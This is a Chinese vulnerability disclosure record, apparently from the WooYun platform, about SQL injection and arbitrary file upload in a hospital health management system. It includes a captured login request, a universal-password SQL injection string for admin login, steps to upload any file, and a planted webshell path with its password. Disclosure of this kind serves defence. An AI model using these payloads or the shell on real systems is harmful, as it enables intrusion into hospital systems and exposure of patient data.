漏洞概要
关注数(24)
关注此漏洞
漏洞标题:杭州希和健康管理系统sql注入/任意文件上传
提交时间:2015-11-10 10:09
修复时间:2016-01-11 15:32
公开时间:2016-01-11 15:32
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
无
漏洞详情
披露状态:
2015-11-10: 细节已通知厂商并且等待厂商处理中
2015-11-20: 厂商已经确认,细节仅向厂商公开
2015-11-30: 细节向核心白帽子及相关领域专家公开
2015-12-10: 细节向普通白帽子公开
2015-12-20: 细节向实习白帽子公开
2016-01-11: 细节向公众公开
简要描述:
123
详细说明:
POST /Login.aspx?type=login HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Referer: http://**.**.**.**/
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: **.**.**.**
Content-Length: 245
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: r00ts blackdoor=2e9ccbb5152d65f93f1e5e440eed2c55; userID=1; organId=1; userName=%u7CFB%u7EDF%u7BA1%u7406%u5458; scope=1
__VIEWSTATE=%2FwEPDwUKMTc0NzA0NzYzMmRkA71oe9P3edLMZIEXCbE%2FN3sK4qFhAGwsmU0fDuEzsZQ%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWAwL4o567DAKl1bKzCQKd%2B7qdDhkCqP40W2j8%2BpKD7BoM8144v0eIiAiIaRrGOyk6wCwI&txtUserName=admin&txtPwd=123456
POST注入
后台万能密码可登陆 admin' or 'a'='a 123456
登陆后点基本信息随便找个人添加附近 可上传任何文件
Getshell http://**.**.**.**/AccessPath/ClientAnnex/201511091931565390193.aspx 密码 gztest
有60多医院在用这个系统
内部信息一览无遗
漏洞证明:
http://**.**.**.**/AccessPath/ClientAnnex/201511091931565390193.aspx 密码 gztest
修复方案:
版权声明:转载请注明来源 金馆长@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2015-11-20 16:10
厂商回复:
CNVD未复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。
最新状态:
暂无
漏洞评价:
评价
-
2016-01-04 22:40 |
金馆长 ( 路人 | Rank:4 漏洞数:2 | Up)